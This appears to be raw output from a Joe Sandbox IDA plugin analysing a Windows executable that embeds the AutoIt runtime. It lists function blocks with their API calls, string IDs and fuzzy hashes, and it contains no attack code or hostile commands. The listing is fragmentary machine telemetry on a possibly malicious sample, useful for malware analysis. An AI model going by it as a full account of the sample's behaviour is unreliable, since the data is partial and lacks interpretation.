                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 1411258926-22481851
                                                              • Opcode ID: 856c88173cf4fc881e5f3d5e4fe0591d725a185db5f4988ab56d30e63feb1246
                                                              • Instruction ID: 769daa22a4bb88b1ac9d142220e39cc35c20962e9fcd0bb84ae038e6514a9c08
                                                              • Opcode Fuzzy Hash: 856c88173cf4fc881e5f3d5e4fe0591d725a185db5f4988ab56d30e63feb1246
                                                              • Instruction Fuzzy Hash: 2C41F772C1422DAACB11FBA4DC85DEEB7B8BF14714F40442AE805A3161EA359D48EF90
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8FDAD,?,?), ref: 00F90E31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-909552448
                                                              • Opcode ID: dc791d453f43d68f822ad6b880cfb1f4e144a049780bd83df90fe0d7182cc521
                                                              • Instruction ID: 365ba489c02585834c4bc6f98ef4164019b3638f275ed2718dcc2c28c51088fb
                                                              • Opcode Fuzzy Hash: dc791d453f43d68f822ad6b880cfb1f4e144a049780bd83df90fe0d7182cc521
                                                              • Instruction Fuzzy Hash: FF419C3250420A8FDF14EF10ED66AEE3364EF11324F144459FC561B292DF799A5AFB60
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F4E2A0,00000010,?,Bad directive syntax error,00F9F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00F6F7C2
                                                              • LoadStringW.USER32(00000000,?,00F4E2A0,00000010), ref: 00F6F7C9
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                              • _wprintf.LIBCMT ref: 00F6F7FC
                                                              • __swprintf.LIBCMT ref: 00F6F81E
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F6F88D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1506413516-4153970271
                                                              • Opcode ID: 85bb0c57f6bc9b24aaf71da6e22446664ad44712757db0210cc3ae54ef412f64
                                                              • Instruction ID: 443049b63c7f56d2f1a2c5b710720b807dd433ad491403b82f66d46eea829bfa
                                                              • Opcode Fuzzy Hash: 85bb0c57f6bc9b24aaf71da6e22446664ad44712757db0210cc3ae54ef412f64
                                                              • Instruction Fuzzy Hash: B221713290421EEFCF11EFA0DC0AEEE7779BF14311F04086AF505660A2EA359668FB51
                                                              APIs
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                                • Part of subcall function 00F17924: _memmove.LIBCMT ref: 00F179AD
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F75330
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F75346
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F75357
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F75369
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F7537A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: SendString$_memmove
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 2279737902-1007645807
                                                              • Opcode ID: 4dde517852340b85a5a09b4f44e84ead91a76d5a9e6d166996bf32eef7e7c129
                                                              • Instruction ID: 2465b7414dae436ae557a95f06d77ba0e2705bb9c1f729bf5723831f87791b2f
                                                              • Opcode Fuzzy Hash: 4dde517852340b85a5a09b4f44e84ead91a76d5a9e6d166996bf32eef7e7c129
                                                              • Instruction Fuzzy Hash: 2211863195021A79D760B761DC4AEFF7B7CEFD5F90F40082EB419920E1EEA04D45E5A2
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 208665112-3771769585
                                                              • Opcode ID: c8c0709ec1232a7177723c50262926e5a3f6a2cd9bc343822fccd9f0a6180dc3
                                                              • Instruction ID: a3c75aafe9b4f928b4fee7337616ff74ce58e36db95ccbb8dd9db83dc06883bd
                                                              • Opcode Fuzzy Hash: c8c0709ec1232a7177723c50262926e5a3f6a2cd9bc343822fccd9f0a6180dc3
                                                              • Instruction Fuzzy Hash: 4D110831A001186BCB24AB709C46EDA77BCDB01721F004177F449D6051EF749D86BA52
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00F74F7A
                                                                • Part of subcall function 00F3049F: timeGetTime.WINMM(?,75A8B400,00F20E7B), ref: 00F304A3
                                                              • Sleep.KERNEL32(0000000A), ref: 00F74FA6
                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00F74FCA
                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F74FEC
                                                              • SetActiveWindow.USER32 ref: 00F7500B
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F75019
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F75038
                                                              • Sleep.KERNEL32(000000FA), ref: 00F75043
                                                              • IsWindow.USER32 ref: 00F7504F
                                                              • EndDialog.USER32(00000000), ref: 00F75060
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: bce01d35f873230abf099ef21341e8808300f73f534e07e85d458b402afdd8d4
                                                              • Instruction ID: a10eac1499694196de470764c093901f7b58b1a9d52228962c514b77eb741943
                                                              • Opcode Fuzzy Hash: bce01d35f873230abf099ef21341e8808300f73f534e07e85d458b402afdd8d4
                                                              • Instruction Fuzzy Hash: 4421CF7560160DAFE7105F30EC88B263B6AEB04B55F08502BF009C21B9CB758D94B663
                                                              APIs
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                              • CoInitialize.OLE32(00000000), ref: 00F7D5EA
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F7D67D
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00F7D691
                                                              • CoCreateInstance.OLE32(00FA2D7C,00000000,00000001,00FC8C1C,?), ref: 00F7D6DD
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F7D74C
                                                              • CoTaskMemFree.OLE32(?,?), ref: 00F7D7A4
                                                              • _memset.LIBCMT ref: 00F7D7E1
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00F7D81D
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F7D840
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00F7D847
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F7D87E
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 00F7D880
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 766ca4414e10d7d3972238671d6b0bdc78a498df479a892e687b1b55ebd537d7
                                                              • Instruction ID: de858cc0e94424a53d2aa25e00c5be6ee1cbf3166b265a00568082b8f592ef06
                                                              • Opcode Fuzzy Hash: 766ca4414e10d7d3972238671d6b0bdc78a498df479a892e687b1b55ebd537d7
                                                              • Instruction Fuzzy Hash: C1B10975A00109AFDB04DFA4CC98DAEBBB9FF48314B148469F909EB261DB30EE45DB51
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 00F6C283
                                                              • GetWindowRect.USER32(00000000,?), ref: 00F6C295
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F6C2F3
                                                              • GetDlgItem.USER32(?,00000002), ref: 00F6C2FE
                                                              • GetWindowRect.USER32(00000000,?), ref: 00F6C310
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F6C364
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00F6C372
                                                              • GetWindowRect.USER32(00000000,?), ref: 00F6C383
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F6C3C6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00F6C3D4
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F6C3F1
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00F6C3FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: 5cbcf67e4fadd30eccf4f6a03a94e82daf27bdb58cbb0f85a09168c39f99d791
                                                              • Instruction ID: f11958311d34880723fdae03ddd0fe1f1330008251c66a5045101e35ac20ad58
                                                              • Opcode Fuzzy Hash: 5cbcf67e4fadd30eccf4f6a03a94e82daf27bdb58cbb0f85a09168c39f99d791
                                                              • Instruction Fuzzy Hash: 24516171F00209AFDB18CFA9DD99ABEBBB6EB88310F14812DF615D7290D7709D449B50
                                                              APIs
                                                                • Part of subcall function 00F11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F12036,?,00000000,?,?,?,?,00F116CB,00000000,?), ref: 00F11B9A
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F120D3
                                                              • KillTimer.USER32(-00000001,?,?,?,?,00F116CB,00000000,?,?,00F11AE2,?,?), ref: 00F1216E
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00F4BCA6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F116CB,00000000,?,?,00F11AE2,?,?), ref: 00F4BCD7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F116CB,00000000,?,?,00F11AE2,?,?), ref: 00F4BCEE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F116CB,00000000,?,?,00F11AE2,?,?), ref: 00F4BD0A
                                                              • DeleteObject.GDI32(00000000), ref: 00F4BD1C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: b056a5dfe9b44a2408ecc2d28ef4f54e8c998f09ca6840212cc365aa9ef9f62a
                                                              • Instruction ID: c3c2132c17207416de8dbc83077e95c289b14d1f2bb7577b7bbd1efb23e7673a
                                                              • Opcode Fuzzy Hash: b056a5dfe9b44a2408ecc2d28ef4f54e8c998f09ca6840212cc365aa9ef9f62a
                                                              • Instruction Fuzzy Hash: 00619D32901A08DFCB25DF64D948B697BF2FF44722F10452AE54296971C775A8A0FB40
                                                              APIs
                                                                • Part of subcall function 00F125DB: GetWindowLongW.USER32(?,000000EB), ref: 00F125EC
                                                              • GetSysColor.USER32(0000000F), ref: 00F121D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: aa64160ccdb49c7ef1b987e71224c49266586f790a92184a3ed8bfd9adbba595
                                                              • Instruction ID: 126a3282f53a3b8e8d22a669050e9aae89211a94fa8b2b5257f1e0e512b250f1
                                                              • Opcode Fuzzy Hash: aa64160ccdb49c7ef1b987e71224c49266586f790a92184a3ed8bfd9adbba595
                                                              • Instruction Fuzzy Hash: F4419231500184ABEB655F68DC88BF93B66EB46331F184266FD65CA1E2C7318C92FB61
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,00F9F910), ref: 00F7A90B
                                                              • GetDriveTypeW.KERNEL32(00000061,00FC89A0,00000061), ref: 00F7A9D5
                                                              • _wcscpy.LIBCMT ref: 00F7A9FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: 63c3b78f1b87bf8352eeeaabb48a5e8230016de95f8ed6ef849617f2824eb8c7
                                                              • Instruction ID: 153ab94945f2703214180c6a87be40f7e7f04ecaabb4bbf5d7fd2775ba9029c6
                                                              • Opcode Fuzzy Hash: 63c3b78f1b87bf8352eeeaabb48a5e8230016de95f8ed6ef849617f2824eb8c7
                                                              • Instruction Fuzzy Hash: E551D0315083019BC704EF14CDA2AAFB7A5EFC4750F41882EF589572A2DB75D949EB83
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __i64tow__itow__swprintf
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 421087845-2263619337
                                                              • Opcode ID: 711d845fb71e34751bdfa54ef530a3770859c5a07797c443be9a5f13904480e1
                                                              • Instruction ID: ebadfc31905d983e749fd4bd94f8f514cf6929786095ffeb99d45a0340737dbb
                                                              • Opcode Fuzzy Hash: 711d845fb71e34751bdfa54ef530a3770859c5a07797c443be9a5f13904480e1
                                                              • Instruction Fuzzy Hash: 12410272A04205AEEB24DF34DC52FBAB7E8EF05320F24446EE849C7281EE759945AB51
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F9716A
                                                              • CreateMenu.USER32 ref: 00F97185
                                                              • SetMenu.USER32(?,00000000), ref: 00F97194
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F97221
                                                              • IsMenu.USER32(?), ref: 00F97237
                                                              • CreatePopupMenu.USER32 ref: 00F97241
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F9726E
                                                              • DrawMenuBar.USER32 ref: 00F97276
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                              • String ID: 0$F
                                                              • API String ID: 176399719-3044882817
                                                              • Opcode ID: f35585625611a9e19ea50157ef398303b8dd55ab7a9d3836ba60c381a4b77461
                                                              • Instruction ID: 614e5254dca0ef844bb24b43bffbc267b2fdb3c7f8f741409a95c1bad9b90695
                                                              • Opcode Fuzzy Hash: f35585625611a9e19ea50157ef398303b8dd55ab7a9d3836ba60c381a4b77461
                                                              • Instruction Fuzzy Hash: B1413575A11309EFEB24EFA4D884E9ABBB5FF49310F14002AF905A7361D731A914EF90
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F9755E
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00F97565
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F97578
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00F97580
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F9758B
                                                              • DeleteDC.GDI32(00000000), ref: 00F97594
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00F9759E
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F975B2
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F975BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 078a9324caafdc41351b3ba2a0325a97bc1babc765e1ec649334c1688f0eb31c
                                                              • Instruction ID: c6f878c7d8e8d0c76f281340b708dbf9d500f1ea7a74e7dcc9e1be6f8283b989
                                                              • Opcode Fuzzy Hash: 078a9324caafdc41351b3ba2a0325a97bc1babc765e1ec649334c1688f0eb31c
                                                              • Instruction Fuzzy Hash: 65316D72515319BBEF12AF64DC09FDA3B69FF09320F150225FA15D60A0C735D825EBA4
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F36E3E
                                                                • Part of subcall function 00F38B28: __getptd_noexit.LIBCMT ref: 00F38B28
                                                              • __gmtime64_s.LIBCMT ref: 00F36ED7
                                                              • __gmtime64_s.LIBCMT ref: 00F36F0D
                                                              • __gmtime64_s.LIBCMT ref: 00F36F2A
                                                              • __allrem.LIBCMT ref: 00F36F80
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F36F9C
                                                              • __allrem.LIBCMT ref: 00F36FB3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F36FD1
                                                              • __allrem.LIBCMT ref: 00F36FE8
